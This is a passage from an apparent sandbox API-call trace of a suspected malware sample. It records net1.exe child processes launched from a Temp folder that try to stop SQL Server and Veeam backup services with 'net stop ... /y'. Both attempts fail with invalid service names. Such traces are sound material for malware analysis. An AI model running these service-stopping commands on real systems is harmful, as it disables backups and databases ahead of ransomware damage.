_Env=0xe59068) returned 0 [0125.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.494] GetConsoleOutputCP () returned 0x1b5 [0125.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.498] sprintf_s (in: _DstBuf=0x23fa7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.498] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0125.500] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.500] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0125.500] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23f848, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x694ad0 [0125.500] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23fa4c | out: Buffer=0x23fa4c*=0x691b08) returned 0x0 [0125.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23fa4c | out: Buffer=0x23fa4c*=0x691b20) returned 0x0 [0125.500] _fileno (_File=0x77032900) returned -2 [0125.500] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.500] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.500] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.500] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.500] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.500] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.501] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.501] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.501] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.501] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.501] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.501] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.501] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.501] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.501] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.501] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.501] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.501] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.501] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.501] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.501] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.501] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.501] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0125.501] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0125.501] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0125.501] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0125.501] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0125.501] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0125.501] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0125.501] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.501] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.501] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0125.501] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0125.501] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0125.501] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0125.501] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.501] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.501] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.501] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2008R2") returned -9 [0125.501] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0125.501] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0125.502] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0125.502] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0125.502] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0125.502] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0125.502] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0125.502] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0125.502] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0125.502] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0125.502] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0125.502] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0125.502] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0125.502] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0125.502] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0125.502] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0125.502] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0125.502] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0125.502] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0125.502] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -15 [0125.502] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0125.502] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0125.502] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2008R2") returned 5 [0125.502] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0125.502] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0125.502] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0125.502] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0125.502] _wcsupr (in: _String="SQLAgent$VEEAMSQL2008R2" | out: _String="SQLAGENT$VEEAMSQL2008R2") returned="SQLAGENT$VEEAMSQL2008R2" [0125.502] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6954b8 [0125.809] GetServiceKeyNameW (in: hSCManager=0x6954b8, lpDisplayName="SQLAGENT$VEEAMSQL2008R2", lpServiceName=0xe5aaf0, lpcchBuffer=0x23f9e8 | out: lpServiceName="", lpcchBuffer=0x23f9e8) returned 0 [0125.810] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0125.810] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0125.810] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0125.810] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0125.810] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0125.810] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0125.810] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0125.810] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0125.810] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0125.810] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0125.810] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -3 [0125.810] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -15 [0125.810] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0125.810] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2008R2") returned -12 [0125.810] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2008R2") returned 5 [0125.811] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2008R2") returned 1 [0125.811] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0125.811] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2008R2") returned -18 [0125.811] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2008R2") returned -5 [0125.811] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x23f9e4 | out: bufptr=0x23f9e4) returned 0x889 [0125.812] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.812] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.813] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.814] GetFileType (hFile=0x0) returned 0x0 [0125.814] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x693b40 [0125.814] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x693b40, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.814] WriteFile (in: hFile=0x0, lpBuffer=0x693b40, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x23f924, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f924, lpOverlapped=0x0) returned 0 [0125.814] LocalFree (hMem=0x693b40) returned 0x0 [0125.814] GetFileType (hFile=0x0) returned 0x0 [0125.814] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x696170 [0125.814] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x696170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ni", lpUsedDefaultChar=0x0) returned 2 [0125.814] WriteFile (in: hFile=0x0, lpBuffer=0x696170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f924, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f924, lpOverlapped=0x0) returned 0 [0125.814] LocalFree (hMem=0x696170) returned 0x0 [0125.814] _ultow (in: _Dest=0x889, _Radix=2357588 | out: _Dest=0x889) returned="2185" [0125.814] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.815] GetFileType (hFile=0x0) returned 0x0 [0125.815] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x696170 [0125.815] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x696170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.815] WriteFile (in: hFile=0x0, lpBuffer=0x696170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23f930, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f930, lpOverlapped=0x0) returned 0 [0125.815] LocalFree (hMem=0x696170) returned 0x0 [0125.815] GetFileType (hFile=0x0) returned 0x0 [0125.815] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x696170 [0125.815] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x696170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ni", lpUsedDefaultChar=0x0) returned 2 [0125.815] WriteFile (in: hFile=0x0, lpBuffer=0x696170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f930, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f930, lpOverlapped=0x0) returned 0 [0125.815] LocalFree (hMem=0x696170) returned 0x0 [0125.815] NetApiBufferFree (Buffer=0x691b08) returned 0x0 [0125.815] NetApiBufferFree (Buffer=0x691b20) returned 0x0 [0125.815] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0125.815] exit (_Code=2) Process: id = "281" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5951f000" os_pid = "0xfd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "113" os_parent_pid = "0x4bc" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 679 os_tid = 0xf58 [0125.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fe4c | out: lpSystemTimeAsFileTime=0x33fe4c*(dwLowDateTime=0x1e8e7cf0, dwHighDateTime=0x1d6f0d1)) [0125.526] GetCurrentProcessId () returned 0xfd8 [0125.526] GetCurrentThreadId () returned 0xf58 [0125.526] GetTickCount () returned 0x11529fe [0125.526] QueryPerformanceCounter (in: lpPerformanceCount=0x33fe44 | out: lpPerformanceCount=0x33fe44*=24462718358) returned 1 [0125.527] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.527] __set_app_type (_Type=0x1) [0125.527] __p__fmode () returned 0x770331f4 [0125.527] __p__commode () returned 0x770331fc [0125.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.527] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.527] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.527] GetConsoleOutputCP () returned 0x1b5 [0125.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.531] sprintf_s (in: _DstBuf=0x33fe04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.531] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0125.533] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.533] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0125.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33fbd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.533] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x92) returned 0x3f3b18 [0125.533] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.533] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fdd4 | out: Buffer=0x33fdd4*=0x3f1b20) returned 0x0 [0125.533] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fdd4 | out: Buffer=0x33fdd4*=0x3f1b38) returned 0x0 [0125.533] _fileno (_File=0x77032900) returned -2 [0125.533] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.533] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.534] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.534] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.534] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.534] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.534] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.534] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.534] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.534] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.534] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.534] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.534] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.534] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.534] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.534] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.534] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.534] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.534] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.534] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.534] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.534] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.534] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0125.534] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0125.534] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0125.534] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0125.534] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0125.534] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0125.534] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0125.534] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0125.534] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0125.534] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0125.534] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0125.534] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0125.534] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0125.534] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 7 [0125.535] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0125.535] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0125.535] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0125.535] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -14 [0125.535] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0125.535] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0125.535] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0125.535] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0125.535] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0125.535] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0125.535] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0125.535] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0125.535] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0125.535] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0125.535] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -9 [0125.535] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0125.535] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0125.535] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0125.535] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0125.535] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0125.536] _wcsupr (in: _String="MSSQLFDLauncher$PROFXENGAGEMENT" | out: _String="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned="MSSQLFDLAUNCHER$PROFXENGAGEMENT" [0125.536] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3f5510 [0125.817] GetServiceKeyNameW (in: hSCManager=0x3f5510, lpDisplayName="MSSQLFDLAUNCHER$PROFXENGAGEMENT", lpServiceName=0xe5aaf0, lpcchBuffer=0x33fd70 | out: lpServiceName="", lpcchBuffer=0x33fd70) returned 0 [0125.818] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0125.818] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -14 [0125.818] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0125.818] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0125.818] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0125.818] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0125.818] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0125.818] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0125.818] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0125.818] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0125.818] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 3 [0125.818] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -9 [0125.818] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0125.818] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0125.818] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0125.818] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0125.818] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0125.818] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0125.818] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 1 [0125.818] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x33fd6c | out: bufptr=0x33fd6c) returned 0x889 [0125.820] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.820] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.820] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.821] GetFileType (hFile=0x0) returned 0x0 [0125.821] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3f3f30 [0125.821] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3f3f30, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.821] WriteFile (in: hFile=0x0, lpBuffer=0x3f3f30, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33fcac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcac, lpOverlapped=0x0) returned 0 [0125.822] LocalFree (hMem=0x3f3f30) returned 0x0 [0125.822] GetFileType (hFile=0x0) returned 0x0 [0125.822] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f61d8 [0125.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f61d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0125.822] WriteFile (in: hFile=0x0, lpBuffer=0x3f61d8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fcac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fcac, lpOverlapped=0x0) returned 0 [0125.822] LocalFree (hMem=0x3f61d8) returned 0x0 [0125.822] _ultow (in: _Dest=0x889, _Radix=3407068 | out: _Dest=0x889) returned="2185" [0125.822] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 